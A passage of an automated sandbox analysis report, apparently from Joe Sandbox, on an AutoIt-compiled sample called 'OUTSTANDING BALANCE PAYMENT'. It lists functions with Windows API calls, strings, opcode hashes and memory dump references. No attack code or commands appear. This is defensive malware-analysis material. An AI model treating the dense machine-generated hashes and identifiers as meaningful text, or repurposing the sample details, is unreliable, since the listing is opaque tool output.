                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002DA630
                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002DA81D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                  • API String ID: 2211948467-2373415609
                                                                  • Opcode ID: 1d75a7cddc2288a37317a03ce7fdd006544cdf4138fa9d9692486d195ed6773a
                                                                  • Instruction ID: 65adccc57c1af20dca24928c20dee40fd4e1d5cbd260afd2c3df6d4537ff3e5b
                                                                  • Opcode Fuzzy Hash: 1d75a7cddc2288a37317a03ce7fdd006544cdf4138fa9d9692486d195ed6773a
                                                                  • Instruction Fuzzy Hash: F702AC75910204EFDB15DFA8CC99EAE7BB9FB48310F00815AF915AB2A1CB70AD41CF60
                                                                  Function 002ED285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetTextColor.GDI32(?,00000000), ref: 002ED2DB
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 002ED30C
                                                                  • GetSysColor.USER32(0000000F), ref: 002ED318
                                                                  • SetBkColor.GDI32(?,000000FF), ref: 002ED332
                                                                  • SelectObject.GDI32(?,00000000), ref: 002ED341
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 002ED36C
                                                                  • GetSysColor.USER32(00000010), ref: 002ED374
                                                                  • CreateSolidBrush.GDI32(00000000), ref: 002ED37B
                                                                  • FrameRect.USER32(?,?,00000000), ref: 002ED38A
                                                                  • DeleteObject.GDI32(00000000), ref: 002ED391
                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 002ED3DC
                                                                  • FillRect.USER32(?,?,00000000), ref: 002ED40E
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 002ED439
                                                                    • Part of subcall function 002ED575: GetSysColor.USER32(00000012), ref: 002ED5AE
                                                                    • Part of subcall function 002ED575: SetTextColor.GDI32(?,?), ref: 002ED5B2
                                                                    • Part of subcall function 002ED575: GetSysColorBrush.USER32(0000000F), ref: 002ED5C8
                                                                    • Part of subcall function 002ED575: GetSysColor.USER32(0000000F), ref: 002ED5D3
                                                                    • Part of subcall function 002ED575: GetSysColor.USER32(00000011), ref: 002ED5F0
                                                                    • Part of subcall function 002ED575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 002ED5FE
                                                                    • Part of subcall function 002ED575: SelectObject.GDI32(?,00000000), ref: 002ED60F
                                                                    • Part of subcall function 002ED575: SetBkColor.GDI32(?,00000000), ref: 002ED618
                                                                    • Part of subcall function 002ED575: SelectObject.GDI32(?,?), ref: 002ED625
                                                                    • Part of subcall function 002ED575: InflateRect.USER32(?,000000FF,000000FF), ref: 002ED644
                                                                    • Part of subcall function 002ED575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002ED65B
                                                                    • Part of subcall function 002ED575: GetWindowLongW.USER32(00000000,000000F0), ref: 002ED670
                                                                    • Part of subcall function 002ED575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002ED698
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                  • String ID:
                                                                  • API String ID: 3521893082-0
                                                                  • Opcode ID: 5563d28352e3188c2a3164538b6f1a0644907163fd6e7bf65837ff164e6ede3a
                                                                  • Instruction ID: de4acfc890299d68648b91f6ca12e559583cb322987cbda8620dfd29d1c7ca2f
                                                                  • Opcode Fuzzy Hash: 5563d28352e3188c2a3164538b6f1a0644907163fd6e7bf65837ff164e6ede3a
                                                                  • Instruction Fuzzy Hash: E9918D72009301AFCB119FA5DC08A6B7BEDFB89325F500A1AF962961E0C771D944CF52
                                                                  Function 002CDBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 002CDBD6
                                                                  • GetDriveTypeW.KERNEL32(?,0031DC54,?,\\.\,0031DC00), ref: 002CDCC3
                                                                  • SetErrorMode.KERNEL32(00000000,0031DC54,?,\\.\,0031DC00), ref: 002CDE29
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$DriveType
                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                  • API String ID: 2907320926-4222207086
                                                                  • Opcode ID: f3bee74c8bcc16cad7f50d952307dfc0c7e629d05766a2a77f03d872d3de102d
                                                                  • Instruction ID: 07d4d801fa9767898111207a16a46325a9ad230eba5503ebecd87dbf641c4b06
                                                                  • Opcode Fuzzy Hash: f3bee74c8bcc16cad7f50d952307dfc0c7e629d05766a2a77f03d872d3de102d
                                                                  • Instruction Fuzzy Hash: C251A031678302ABC605EF14C8C1E69F7A0FB94705F248A6EF407972D1CBA1DA65DB42
                                                                  Function 0028CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsnicmp
                                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                  • API String ID: 1038674560-86951937
                                                                  • Opcode ID: 110b0da3c9cba8b41ff94803c75475076aaf4f274f491ec171fc3fb5e296e4b9
                                                                  • Instruction ID: 31d9af535b6f3feb40036e20a3e348dbed1e10e74a7175a2aa2987fe3a0abe45
                                                                  • Opcode Fuzzy Hash: 110b0da3c9cba8b41ff94803c75475076aaf4f274f491ec171fc3fb5e296e4b9
                                                                  • Instruction Fuzzy Hash: 46815A3427120AABDB15BE64DC42FFB7769AF16350F244035F905A60C2EB70D975CBA0
                                                                  Function 002EC6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 002EC788
                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 002EC83E
                                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 002EC859
                                                                  • SendMessageW.USER32(?,000000F1,?,00000000), ref: 002ECB15
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window
                                                                  • String ID: 0
                                                                  • API String ID: 2326795674-4108050209
                                                                  • Opcode ID: d41346b1e4a604a78c8794ea60703e6ca43e8b2b3679d26d98e6d8a75c9f6023
                                                                  • Instruction ID: e9140b42dd6615346e8a2f47b61b60b9c6b87aa4d24cb6e968bb0aee43066b74
                                                                  • Opcode Fuzzy Hash: d41346b1e4a604a78c8794ea60703e6ca43e8b2b3679d26d98e6d8a75c9f6023
                                                                  • Instruction Fuzzy Hash: 4EF127701A4382AFD7118FA6CC45BABBBE8FF45314FA4052DF588D62A1C774D862CB91
                                                                  Function 002E638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?,0031DC00), ref: 002E6449
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpper
                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                  • API String ID: 3964851224-45149045
                                                                  • Opcode ID: c158987b29bfc7b98c789fbecfcd8756c81bcc17cf68cfcc1f901f47f75d9ecc
                                                                  • Instruction ID: 7e976180704e07d36481ee8674600a75dacc0085df81b5ee1f17f72e12c8a54f
                                                                  • Opcode Fuzzy Hash: c158987b29bfc7b98c789fbecfcd8756c81bcc17cf68cfcc1f901f47f75d9ecc
                                                                  • Instruction Fuzzy Hash: C6C1D5342342828BCF05EF11C555AAEB7A5BFA4784F404859F8855B3D2DB70ED6ACF42
                                                                  Function 002ED575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSysColor.USER32(00000012), ref: 002ED5AE
                                                                  • SetTextColor.GDI32(?,?), ref: 002ED5B2
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 002ED5C8
                                                                  • GetSysColor.USER32(0000000F), ref: 002ED5D3
                                                                  • CreateSolidBrush.GDI32(?), ref: 002ED5D8
                                                                  • GetSysColor.USER32(00000011), ref: 002ED5F0
                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 002ED5FE
                                                                  • SelectObject.GDI32(?,00000000), ref: 002ED60F
                                                                  • SetBkColor.GDI32(?,00000000), ref: 002ED618
                                                                  • SelectObject.GDI32(?,?), ref: 002ED625
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 002ED644
                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002ED65B
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 002ED670
                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002ED698
                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 002ED6BF
                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 002ED6DD
                                                                  • DrawFocusRect.USER32(?,?), ref: 002ED6E8
                                                                  • GetSysColor.USER32(00000011), ref: 002ED6F6
                                                                  • SetTextColor.GDI32(?,00000000), ref: 002ED6FE
                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 002ED712
                                                                  • SelectObject.GDI32(?,002ED2A5), ref: 002ED729
                                                                  • DeleteObject.GDI32(?), ref: 002ED734
                                                                  • SelectObject.GDI32(?,?), ref: 002ED73A
                                                                  • DeleteObject.GDI32(?), ref: 002ED73F
                                                                  • SetTextColor.GDI32(?,?), ref: 002ED745
                                                                  • SetBkColor.GDI32(?,?), ref: 002ED74F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                  • String ID:
                                                                  • API String ID: 1996641542-0
                                                                  • Opcode ID: 83d0ec2a9ef6ce6ad92bd0e266f35ee4487550df8c00d7c3f22edfd8ad0d6d08
                                                                  • Instruction ID: b6093dcb5ea44550a31b61e109917cc4f3eae1f0ae5f30342a36da72e3a51f83
                                                                  • Opcode Fuzzy Hash: 83d0ec2a9ef6ce6ad92bd0e266f35ee4487550df8c00d7c3f22edfd8ad0d6d08
                                                                  • Instruction Fuzzy Hash: 96514D71901208BFDF119FA9DC48EAE7BB9FF08320F104516FA15AB2A1D7719A40CF50
                                                                  Function 002EB6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 002EB7B0
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002EB7C1
                                                                  • CharNextW.USER32(0000014E), ref: 002EB7F0
                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 002EB831
                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 002EB847
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002EB858
                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 002EB875
                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 002EB8C7
                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 002EB8DD
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 002EB90E
                                                                  • _memset.LIBCMT ref: 002EB933
                                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 002EB97C
                                                                  • _memset.LIBCMT ref: 002EB9DB
                                                                  • SendMessageW.USER32 ref: 002EBA05
                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 002EBA5D
                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 002EBB0A
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 002EBB2C
                                                                  • GetMenuItemInfoW.USER32(?), ref: 002EBB76
                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002EBBA3
                                                                  • DrawMenuBar.USER32(?), ref: 002EBBB2
                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 002EBBDA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                  • String ID: 0
                                                                  • API String ID: 1073566785-4108050209
                                                                  • Opcode ID: 57c8d852b3d9a928a81097b8c8054b2531a1ab766b055a9154e8b22d38099b35
                                                                  • Instruction ID: 97213610c3788f484d8cbaab212cf179a9cb6fb70e9f43062c29e834bf19f46e
                                                                  • Opcode Fuzzy Hash: 57c8d852b3d9a928a81097b8c8054b2531a1ab766b055a9154e8b22d38099b35
                                                                  • Instruction Fuzzy Hash: 89E1C271950259ABDF22CFA2CC84EEF7BB8FF05314F50815AF915AA290DB708961CF60
                                                                  Function 00282EC0 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 346COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Foreground
                                                                  • String ID: ACTIVE$ALL$CLASS$H+3$HANDLE$INSTANCE$L+3$LAST$P+3$REGEXPCLASS$REGEXPTITLE$T+3$TITLE
                                                                  • API String ID: 62970417-1565501235
                                                                  • Opcode ID: 3dcecf7838560f3e86df19847896665795f4d0ba495412cdda4f879b98f3dca0
                                                                  • Instruction ID: f260eabeb60278a1ba905d76ab6768a50e44859fea202e2020c266d99d7a343a
                                                                  • Opcode Fuzzy Hash: 3dcecf7838560f3e86df19847896665795f4d0ba495412cdda4f879b98f3dca0
                                                                  • Instruction Fuzzy Hash: F0D1E63012464BDBCB05EF20C4819AAFBA4BF55384F104A2DF556536A2DB70E9BECF91
                                                                  Function 002E764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 002E778A
                                                                  • GetDesktopWindow.USER32 ref: 002E779F
                                                                  • GetWindowRect.USER32(00000000), ref: 002E77A6
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 002E7808
                                                                  • DestroyWindow.USER32(?), ref: 002E7834
                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002E785D
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002E787B
                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 002E78A1
                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 002E78B6
                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 002E78C9
                                                                  • IsWindowVisible.USER32(?), ref: 002E78E9
                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 002E7904
                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 002E7918
                                                                  • GetWindowRect.USER32(?,?), ref: 002E7930
                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 002E7956
                                                                  • GetMonitorInfoW.USER32 ref: 002E7970
                                                                  • CopyRect.USER32(?,?), ref: 002E7987
                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 002E79F2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                  • String ID: ($0$tooltips_class32
                                                                  • API String ID: 698492251-4156429822
                                                                  • Opcode ID: 3aefc5be4a889803706f063fa282e8d1667a3a99aa8336960af659bbc33ffa87
                                                                  • Instruction ID: fc0604bc0ee11e732c8b9aa685586de91bda343533bafff38cfeb736ab0fc81d
                                                                  • Opcode Fuzzy Hash: 3aefc5be4a889803706f063fa282e8d1667a3a99aa8336960af659bbc33ffa87
                                                                  • Instruction Fuzzy Hash: EAB1C171659341AFDB04DF65C848B6ABBE4FF88310F40891DF5999B292D770EC14CB92
                                                                  Function 002C6CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 002C6CFB
                                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 002C6D21
                                                                  • _wcscpy.LIBCMT ref: 002C6D4F
                                                                  • _wcscmp.LIBCMT ref: 002C6D5A
                                                                  • _wcscat.LIBCMT ref: 002C6D70
                                                                  • _wcsstr.LIBCMT ref: 002C6D7B
                                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 002C6D97
                                                                  • _wcscat.LIBCMT ref: 002C6DE0
                                                                  • _wcscat.LIBCMT ref: 002C6DE7
                                                                  • _wcsncpy.LIBCMT ref: 002C6E12
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                  • API String ID: 699586101-1459072770
                                                                  • Opcode ID: 85993d76e03752e33733465c07d6cc8a7110b92da2b67287962698915e3f8606
                                                                  • Instruction ID: 639cfd22cc8efd1637c3740c9c5609aca54f4a9015814e5af49707a8b4b5d75a
                                                                  • Opcode Fuzzy Hash: 85993d76e03752e33733465c07d6cc8a7110b92da2b67287962698915e3f8606
                                                                  • Instruction Fuzzy Hash: 2A41EA716102017BEB01AB64CD87EFF77BCDF46720F14416AF901E2182EF759A21DAA5
                                                                  Function 0029A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0029A939
                                                                  • GetSystemMetrics.USER32(00000007), ref: 0029A941
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0029A96C
                                                                  • GetSystemMetrics.USER32(00000008), ref: 0029A974
                                                                  • GetSystemMetrics.USER32(00000004), ref: 0029A999
                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0029A9B6
                                                                  • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0029A9C6
                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0029A9F9
                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0029AA0D
                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 0029AA2B
                                                                  • GetStockObject.GDI32(00000011), ref: 0029AA47
                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 0029AA52
                                                                    • Part of subcall function 0029B63C: GetCursorPos.USER32(000000FF), ref: 0029B64F
                                                                    • Part of subcall function 0029B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0029B66C
                                                                    • Part of subcall function 0029B63C: GetAsyncKeyState.USER32(00000001), ref: 0029B691
                                                                    • Part of subcall function 0029B63C: GetAsyncKeyState.USER32(00000002), ref: 0029B69F
                                                                  • SetTimer.USER32(00000000,00000000,00000028,0029AB87), ref: 0029AA79
                                                                  Strings
                                                                  Memory Dump Source
